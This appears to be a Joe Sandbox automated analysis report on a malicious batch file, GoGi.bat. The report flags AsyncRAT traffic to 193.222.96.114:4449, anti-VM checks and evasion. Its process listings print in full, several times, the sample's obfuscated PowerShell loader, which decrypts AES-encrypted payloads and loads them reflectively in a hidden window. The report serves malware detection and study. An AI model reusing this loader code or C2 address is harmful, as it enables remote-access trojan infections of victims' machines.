Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
GoGi.bat

Overview

General Information

Sample name:GoGi.bat
Analysis ID:1429040
MD5:cab2108a81d68104dd9b15efcedf8351
SHA1:03852c18f75cad87f71693fb1973d9a04e8910ed
SHA256:a2dfe970dc385f9aa1a81946c4bc41144d182dbddb02e37ce4c5b52c9b884aaa
Tags:bat
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Snort IDS alert for network traffic
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Suspicious powershell command line found
Very long command line found
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • cmd.exe (PID: 6740 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\GoGi.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6936 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\GoGi.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7052 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\GoGi.bat';$gPQY='CmYpnhamYpnnmYpngmYpnemYpnEmYpnxtmYpnenmYpnsmYpniomYpnnmYpn'.Replace('mYpn', ''),'LoaUtEPdUtEP'.Replace('UtEP', ''),'MaiCYgQnMCYgQodCYgQuleCYgQ'.Replace('CYgQ', ''),'SprHTnlitrHTn'.Replace('rHTn', ''),'TrrzhRarzhRnsfrzhRorrzhRmFrzhRirzhRnarzhRlBlrzhRorzhRckrzhR'.Replace('rzhR', ''),'GetuUbXCuUbXuuUbXruUbXreuUbXntuUbXPuUbXrouUbXcuUbXesuUbXsuUbX'.Replace('uUbX', ''),'FrFEdOomBFEdOasFEdOe64FEdOStrFEdOiFEdOngFEdO'.Replace('FEdO', ''),'ReanclddLncldinencldsncld'.Replace('ncld', ''),'DjPqYejPqYcojPqYmpjPqYrejPqYssjPqY'.Replace('jPqY', ''),'IPIJhnvPIJhokPIJhePIJh'.Replace('PIJh', ''),'CopZKPiyTZKPioZKPi'.Replace('ZKPi', ''),'ElIXGDeIXGDmIXGDenIXGDtAIXGDtIXGD'.Replace('IXGD', ''),'CruXrmeuXrmatuXrmeDeuXrmcryuXrmptuXrmoruXrm'.Replace('uXrm', ''),'EJuQRntJuQRrJuQRyPJuQRoinJuQRtJuQR'.Replace('JuQR', '');powershell -w hidden;function oukWk($hMAdX){$uBEEb=[System.Security.Cryptography.Aes]::Create();$uBEEb.Mode=[System.Security.Cryptography.CipherMode]::CBC;$uBEEb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$uBEEb.Key=[System.Convert]::($gPQY[6])('TGdOerQan8DiYOIpc1W3E6Uf7wMJSi91JjPhdKuCB3Q=');$uBEEb.IV=[System.Convert]::($gPQY[6])('CruLH9j6aex2cpz0fozZ+w==');$XBRRE=$uBEEb.($gPQY[12])();$gomww=$XBRRE.($gPQY[4])($hMAdX,0,$hMAdX.Length);$XBRRE.Dispose();$uBEEb.Dispose();$gomww;}function SIliJ($hMAdX){$nQeHe=New-Object System.IO.MemoryStream(,$hMAdX);$EvPMN=New-Object System.IO.MemoryStream;$uxdRy=New-Object System.IO.Compression.GZipStream($nQeHe,[IO.Compression.CompressionMode]::($gPQY[8]));$uxdRy.($gPQY[10])($EvPMN);$uxdRy.Dispose();$nQeHe.Dispose();$EvPMN.Dispose();$EvPMN.ToArray();}$WrkBk=[System.IO.File]::($gPQY[7])([Console]::Title);$dItwN=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 5).Substring(2))));$Yylgf=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 6).Substring(2))));[System.Reflection.Assembly]::($gPQY[1])([byte[]]$Yylgf).($gPQY[13]).($gPQY[9])($null,$null);[System.Reflection.Assembly]::($gPQY[1])([byte[]]$dItwN).($gPQY[13]).($gPQY[9])($null,$null); " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7132 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 4296 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\GoGi.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6936, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7132, ProcessName: powershell.exe
Timestamp:04/20/24-10:18:04.027368
SID:2850454
Source Port:4449
Destination Port:49730
Protocol:TCP
Classtype:A Network Trojan was detected

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
Source: Binary string: Microsoft.Powershell.PSReadline.pdbY source: powershell.exe, 00000006.00000002.1712288972.000001F27A016000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000006.00000002.1712872404.000001F27A27B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32p source: powershell.exe, 00000006.00000002.1712872404.000001F27A27B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1712872404.000001F27A27B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdb{ source: powershell.exe, 00000006.00000002.1712872404.000001F27A27B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Core.pdba source: powershell.exe, 00000006.00000002.1712288972.000001F27A016000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000006.00000002.1712872404.000001F27A27B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Powershell.PSReadline.pdbC source: powershell.exe, 00000006.00000002.1712872404.000001F27A27B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.1712872404.000001F27A2A4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdbL source: powershell.exe, 00000006.00000002.1712872404.000001F27A27B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .pdb?yzL source: powershell.exe, 00000006.00000002.1711917889.000001F279FC8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dows\dll\System.Core.pdb source: powershell.exe, 00000006.00000002.1712288972.000001F27A016000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.Powershell.PSReadline.pdb1 source: powershell.exe, 00000006.00000002.1711917889.000001F279FBB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000006.00000002.1712288972.000001F27A016000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadLine.PDBU+ source: powershell.exe, 00000006.00000002.1712872404.000001F27A27B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdbd source: powershell.exe, 00000006.00000002.1712288972.000001F27A016000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Core.pdbpdbore.pdb source: powershell.exe, 00000006.00000002.1712872404.000001F27A27B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000006.00000002.1712872404.000001F27A27B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.Powershell.PSReadline.pdbl source: powershell.exe, 00000006.00000002.1711917889.000001F279FBB000.00000004.00000020.00020000.00000000.sdmp

Networking

barindex
Source: TrafficSnort IDS: 2850454 ETPRO TROJAN Observed Malicious SSL Cert (AsyncRAT) 193.222.96.114:4449 -> 192.168.2.4:49730
Source: global trafficTCP traffic: 192.168.2.4:49730 -> 193.222.96.114:4449
Source: Joe Sandbox ViewASN Name: SWISSCOMSwisscomSwitzerlandLtdCH SWISSCOMSwisscomSwitzerlandLtdCH
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: unknownTCP traffic detected without corresponding DNS query: 193.222.96.114
Source: 77EC63BDA74BD0D0E0426DC8F80085060.5.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 00000006.00000002.1708498223.000001F272013000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1708498223.000001F271EDD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1691671492.000001F262233000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.1691671492.000001F262135000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000006.00000002.1691671492.000001F261E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.1691671492.000001F263829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000006.00000002.1691671492.000001F262135000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000006.00000002.1691671492.000001F261E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000006.00000002.1691671492.000001F262135000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000006.00000002.1691671492.000001F262135000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000006.00000002.1691671492.000001F262135000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000006.00000002.1691671492.000001F262135000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000006.00000002.1691671492.000001F262D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000006.00000002.1708498223.000001F272013000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1691671492.000001F263A6F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1708498223.000001F271EDD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1691671492.000001F262135000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000006.00000002.1691671492.000001F263829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000006.00000002.1691671492.000001F263829000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX

System Summary

barindex
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2182
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2182Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B8A6E206_2_00007FFD9B8A6E20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B8BDCA06_2_00007FFD9B8BDCA0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B8A63C86_2_00007FFD9B8A63C8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B8AC93B6_2_00007FFD9B8AC93B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B8AF8D86_2_00007FFD9B8AF8D8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B8A0E326_2_00007FFD9B8A0E32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B8AF4CF6_2_00007FFD9B8AF4CF
Source: classification engineClassification label: mal68.evad.winBAT@11/10@0/1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\MyDataJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6956:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6760:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\nkvohxapain
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3kds4ge5.rwg.ps1Jump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\GoGi.bat" "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\GoGi.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\GoGi.bat"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\GoGi.bat';$gPQY='CmYpnhamYpnnmYpngmYpnemYpnEmYpnxtmYpnenmYpnsmYpniomYpnnmYpn'.Replace('mYpn', ''),'LoaUtEPdUtEP'.Replace('UtEP', ''),'MaiCYgQnMCYgQodCYgQuleCYgQ'.Replace('CYgQ', ''),'SprHTnlitrHTn'.Replace('rHTn', ''),'TrrzhRarzhRnsfrzhRorrzhRmFrzhRirzhRnarzhRlBlrzhRorzhRckrzhR'.Replace('rzhR', ''),'GetuUbXCuUbXuuUbXruUbXreuUbXntuUbXPuUbXrouUbXcuUbXesuUbXsuUbX'.Replace('uUbX', ''),'FrFEdOomBFEdOasFEdOe64FEdOStrFEdOiFEdOngFEdO'.Replace('FEdO', ''),'ReanclddLncldinencldsncld'.Replace('ncld', ''),'DjPqYejPqYcojPqYmpjPqYrejPqYssjPqY'.Replace('jPqY', ''),'IPIJhnvPIJhokPIJhePIJh'.Replace('PIJh', ''),'CopZKPiyTZKPioZKPi'.Replace('ZKPi', ''),'ElIXGDeIXGDmIXGDenIXGDtAIXGDtIXGD'.Replace('IXGD', ''),'CruXrmeuXrmatuXrmeDeuXrmcryuXrmptuXrmoruXrm'.Replace('uXrm', ''),'EJuQRntJuQRrJuQRyPJuQRoinJuQRtJuQR'.Replace('JuQR', '');powershell -w hidden;function oukWk($hMAdX){$uBEEb=[System.Security.Cryptography.Aes]::Create();$uBEEb.Mode=[System.Security.Cryptography.CipherMode]::CBC;$uBEEb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$uBEEb.Key=[System.Convert]::($gPQY[6])('TGdOerQan8DiYOIpc1W3E6Uf7wMJSi91JjPhdKuCB3Q=');$uBEEb.IV=[System.Convert]::($gPQY[6])('CruLH9j6aex2cpz0fozZ+w==');$XBRRE=$uBEEb.($gPQY[12])();$gomww=$XBRRE.($gPQY[4])($hMAdX,0,$hMAdX.Length);$XBRRE.Dispose();$uBEEb.Dispose();$gomww;}function SIliJ($hMAdX){$nQeHe=New-Object System.IO.MemoryStream(,$hMAdX);$EvPMN=New-Object System.IO.MemoryStream;$uxdRy=New-Object System.IO.Compression.GZipStream($nQeHe,[IO.Compression.CompressionMode]::($gPQY[8]));$uxdRy.($gPQY[10])($EvPMN);$uxdRy.Dispose();$nQeHe.Dispose();$EvPMN.Dispose();$EvPMN.ToArray();}$WrkBk=[System.IO.File]::($gPQY[7])([Console]::Title);$dItwN=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 5).Substring(2))));$Yylgf=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 6).Substring(2))));[System.Reflection.Assembly]::($gPQY[1])([byte[]]$Yylgf).($gPQY[13]).($gPQY[9])($null,$null);[System.Reflection.Assembly]::($gPQY[1])([byte[]]$dItwN).($gPQY[13]).($gPQY[9])($null,$null); "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\GoGi.bat" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\GoGi.bat';$gPQY='CmYpnhamYpnnmYpngmYpnemYpnEmYpnxtmYpnenmYpnsmYpniomYpnnmYpn'.Replace('mYpn', ''),'LoaUtEPdUtEP'.Replace('UtEP', ''),'MaiCYgQnMCYgQodCYgQuleCYgQ'.Replace('CYgQ', ''),'SprHTnlitrHTn'.Replace('rHTn', ''),'TrrzhRarzhRnsfrzhRorrzhRmFrzhRirzhRnarzhRlBlrzhRorzhRckrzhR'.Replace('rzhR', ''),'GetuUbXCuUbXuuUbXruUbXreuUbXntuUbXPuUbXrouUbXcuUbXesuUbXsuUbX'.Replace('uUbX', ''),'FrFEdOomBFEdOasFEdOe64FEdOStrFEdOiFEdOngFEdO'.Replace('FEdO', ''),'ReanclddLncldinencldsncld'.Replace('ncld', ''),'DjPqYejPqYcojPqYmpjPqYrejPqYssjPqY'.Replace('jPqY', ''),'IPIJhnvPIJhokPIJhePIJh'.Replace('PIJh', ''),'CopZKPiyTZKPioZKPi'.Replace('ZKPi', ''),'ElIXGDeIXGDmIXGDenIXGDtAIXGDtIXGD'.Replace('IXGD', ''),'CruXrmeuXrmatuXrmeDeuXrmcryuXrmptuXrmoruXrm'.Replace('uXrm', ''),'EJuQRntJuQRrJuQRyPJuQRoinJuQRtJuQR'.Replace('JuQR', '');powershell -w hidden;function oukWk($hMAdX){$uBEEb=[System.Security.Cryptography.Aes]::Create();$uBEEb.Mode=[System.Security.Cryptography.CipherMode]::CBC;$uBEEb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$uBEEb.Key=[System.Convert]::($gPQY[6])('TGdOerQan8DiYOIpc1W3E6Uf7wMJSi91JjPhdKuCB3Q=');$uBEEb.IV=[System.Convert]::($gPQY[6])('CruLH9j6aex2cpz0fozZ+w==');$XBRRE=$uBEEb.($gPQY[12])();$gomww=$XBRRE.($gPQY[4])($hMAdX,0,$hMAdX.Length);$XBRRE.Dispose();$uBEEb.Dispose();$gomww;}function SIliJ($hMAdX){$nQeHe=New-Object System.IO.MemoryStream(,$hMAdX);$EvPMN=New-Object System.IO.MemoryStream;$uxdRy=New-Object System.IO.Compression.GZipStream($nQeHe,[IO.Compression.CompressionMode]::($gPQY[8]));$uxdRy.($gPQY[10])($EvPMN);$uxdRy.Dispose();$nQeHe.Dispose();$EvPMN.Dispose();$EvPMN.ToArray();}$WrkBk=[System.IO.File]::($gPQY[7])([Console]::Title);$dItwN=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 5).Substring(2))));$Yylgf=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 6).Substring(2))));[System.Reflection.Assembly]::($gPQY[1])([byte[]]$Yylgf).($gPQY[13]).($gPQY[9])($null,$null);[System.Reflection.Assembly]::($gPQY[1])([byte[]]$dItwN).($gPQY[13]).($gPQY[9])($null,$null); "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hiddenJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
